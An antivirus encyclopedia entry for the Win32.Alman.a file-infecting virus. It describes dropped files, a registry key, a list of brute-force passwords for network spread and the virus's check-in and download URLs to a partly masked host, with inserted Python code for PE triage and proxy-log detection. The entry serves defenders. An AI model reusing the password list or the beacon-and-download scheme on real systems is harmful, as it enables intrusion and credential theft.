
Virus.Win32.Alman.a

RISK LEVEL:2




This virus infects Windows executable files. It is a Windows PE EXE file.

Installation

When launching, the virus extracts the following files from its body:

%WinDir%\AppPatch\deamon.dll - this file is 3 072 bytes in size;
%WinDir%\c_126.nls - this file is 31 744 bytes in size.

It creates the following registry key:

[HKCR\CLSID\{C111980D-B372-44b4-8095-1B6060E8C647}]

which contains a link to the virus executable file.

The virus infects all write-accessible Windows executable files (PE-EXE) on all disks on the victim computer and in accessible network folders. The virus does not infect files with the following names:

wooolcfg.exe, woool.exe, ztconfig.exe, patchupdate.exe, trojankiller.exe, xy2player.exe, flyff.exe, xy2.exe, au_unins_web.exe, cabal.exe, cabalmain9x.exe, cabalmain.exe, meteor.exe, patcher.exe, mjonline.exe, config.exe, zuonline.exe, userpic.exe, main.exe, dk2.exe, autoupdate.exe, dbfsupdate.exe, asktao.exe, sealspeed.exe, xlqy2.exe, game.exe, wb-service.exe, nbt-dragonraja2006.exe, dragonraja.exe, mhclient-connect.exe, hs.exe, mts.exe, gc.exe, zfs.exe, neuz.exe, maplestory.exe, nsstarter.exe, nmcosrv.exe, ca.exe, nmservice.exe, kartrider.exe, audition.exe, zhengtu.exe

The virus writes its executable file to the beginning of the file being infected, displacing the original contents of the file downwards.
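Because the original program is pushed down intact behind the virus body, an infected file looks like two PE images back to back. The following triage check is an added example, not part of the original description: it assumes the prepended body has no overlay of its own, and `tiny_pe` builds constructed, header-only test data.

```python
import struct

def pe_disk_end(buf, base=0):
    """Offset just past the last section's raw data of the PE image that
    starts at `base`, or None if no valid PE header is found there."""
    if buf[base:base + 2] != b"MZ" or len(buf) < base + 0x40:
        return None
    (e_lfanew,) = struct.unpack_from("<I", buf, base + 0x3C)
    nt = base + e_lfanew
    if buf[nt:nt + 4] != b"PE\0\0" or len(buf) < nt + 24:
        return None
    (nsec,) = struct.unpack_from("<H", buf, nt + 6)       # NumberOfSections
    (opt_size,) = struct.unpack_from("<H", buf, nt + 20)  # SizeOfOptionalHeader
    table = nt + 24 + opt_size                            # first section header
    end = table + 40 * nsec
    if len(buf) < end:
        return None
    for i in range(nsec):
        raw_size, raw_ptr = struct.unpack_from("<II", buf, table + 40 * i + 16)
        if raw_size:
            end = max(end, base + raw_ptr + raw_size)
    return end

def embedded_host_offset(buf):
    """Offset of a second PE image starting exactly where the first one
    ends on disk (the displaced original program), else None."""
    end = pe_disk_end(buf)
    if end is None or end >= len(buf):
        return None
    return end if pe_disk_end(buf, end) is not None else None

def tiny_pe(payload):
    """Constructed test data: a PE-shaped header with one section.
    It is not a loadable program."""
    hdr = bytearray(0x200)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)       # e_lfanew
    hdr[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<HH", hdr, 0x44, 0x14C, 1)  # Machine, NumberOfSections
    struct.pack_into("<H", hdr, 0x54, 0xE0)       # SizeOfOptionalHeader
    sec = 0x40 + 24 + 0xE0
    hdr[sec:sec + 8] = b".text\0\0\0"
    struct.pack_into("<II", hdr, sec + 16, len(payload), 0x200)
    return bytes(hdr) + payload

CLEAN = tiny_pe(b"\x90" * 0x200)              # stands in for the original file
INFECTED = tiny_pe(b"V" * 0x200) + CLEAN      # prepended body + displaced original
```

Self-extracting installers can also carry a PE in their overlay, so a hit is a reason to inspect the file, not a verdict.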

In order to infect files located in network folders, the virus attempts to connect to remote machines using the Administrator account and one of the following passwords:

zxcvqazwsxqazqwer!@#$%^&*()!@#$%^&*(!@#$%^&*!@#$%^&!@#$%^!@#$%aasdf sdfgh!@#$654321123456123451234123111

The virus also sends information to the remote malicious user's site about the amount of free space on the C disk, the operating system and Internet Explorer versions on the victim machine, and about the presence of drivers in the system which have one of the names listed below:

Hooksys, KWatch3, KregEx, KLPF, NaiAvFilter1, NAVAP, AVGNTMGR, AvgTdi, nod32drv, PavProtect, TMFilter, BDFsDrv, VETFDDNT

This information is sent in the following request to the remote malicious user's site:

http://****mrw0rldwide.com/co.asp?action=post&HD=<amount of free space>&OT=<operating system version> &IV=<version of Internet Explorer>&AV=<installed drivers>

The virus also gets a list of files to be downloaded from the following link:

http://****mrw0rldwide.com/z.dat

It then downloads files from the list, saves them to the Windows temporary directory and launches them for execution.
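The check-in request and the download-list fetch described above can be hunted for in web proxy logs. This is an added detection example, not part of the original description; the log layout (`<timestamp> <client_ip> <method> <url>`), the sample lines and every host name in them are constructed, and only the path, parameter names and visible host suffix come from the text.

```python
from urllib.parse import urlsplit, parse_qs

# Parameter names from the request shown above (compared case-insensitively)
REQUIRED = {"ACTION", "HD", "OT", "IV", "AV"}
HOST_SUFFIX = "mrw0rldwide.com"   # visible part of the masked host name

def classify(url):
    """Return 'beacon', 'download-list' or None for one requested URL."""
    parts = urlsplit(url)
    path = parts.path.lower()
    pairs = parse_qs(parts.query, keep_blank_values=True)
    query = {k.upper(): v[0] for k, v in pairs.items()}
    # The host is masked in the write-up, so the check-in is matched on
    # path and parameter set alone.
    if (path.endswith("/co.asp") and REQUIRED.issubset(query)
            and query["ACTION"].lower() == "post"):
        return "beacon"
    # z.dat is a generic file name, so the host suffix is required as well.
    if path == "/z.dat" and (parts.hostname or "").endswith(HOST_SUFFIX):
        return "download-list"
    return None

def scan(lines):
    """Return (client_ip, kind, url) for every matching log line."""
    hits = []
    for line in lines:
        fields = line.split(None, 3)
        if len(fields) < 4:
            continue
        url = fields[3].strip()
        kind = classify(url)
        if kind:
            hits.append((fields[1], kind, url))
    return hits

# Constructed sample log lines (hosts and parameter values are placeholders)
SAMPLE_LOG = [
    "2007-06-01T10:00:01 10.0.0.23 GET http://c2.example/co.asp?action=post&HD=10240&OT=5.1&IV=6.0&AV=KLPF",
    "2007-06-01T10:00:02 10.0.0.23 GET http://placeholder-mrw0rldwide.com/z.dat",
    "2007-06-01T10:00:05 10.0.0.40 GET http://intranet.example/co.asp?action=view&id=7",
    "2007-06-01T10:00:09 10.0.0.41 GET http://files.example/z.dat",
]
```

A client that produces both hit types in sequence, as 10.0.0.23 does in the sample, is a strong candidate for the file and registry checks listed in the removal steps.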

At the time of writing, the virus downloaded files from the following links:

http://down****net/css.jpg
http://down****net/wow.jpg

and saved them as shown below:

%Temp%\css.jpg - this file is 62 792 bytes in size. It will be detected by Kaspersky Anti-Virus as Trojan-PSW.Win32.OnLineGames.afd;

%Temp%\wow.jpg - this file is 40 241 bytes in size. It will be detected by Kaspersky Anti-Virus as Trojan-PSW.Win32.WOW.sv.

If your computer does not have an up-to-date antivirus, or does not have an antivirus solution at all, follow the instructions below to delete the malicious program:

  1. Use Task Manager to terminate the malicious process.
  2. Delete the original virus file (the location will depend on how the program originally penetrated the victim machine).
  3. Delete the following parameter from the system registry (see What is a system registry and how do I use it for details on how to edit the registry).
    [HKCR\CLSID\{C111980D-B372-44b4-8095-1B6060E8C647}]
  4. Delete the following files:
    %WinDir%\AppPatch\deamon.dll
    %WinDir%\c_126.nls
    %Temp%\css.jpg
    %Temp%\wow.jpg
  5. Delete all copies of the virus from the hard disk:
  6. Update your antivirus databases and perform a full scan of the computer (download a trial version of Kaspersky Anti-Virus).


Printed From:http://www.viruslist.com/en/viruses/encyclopedia?virusid=156642

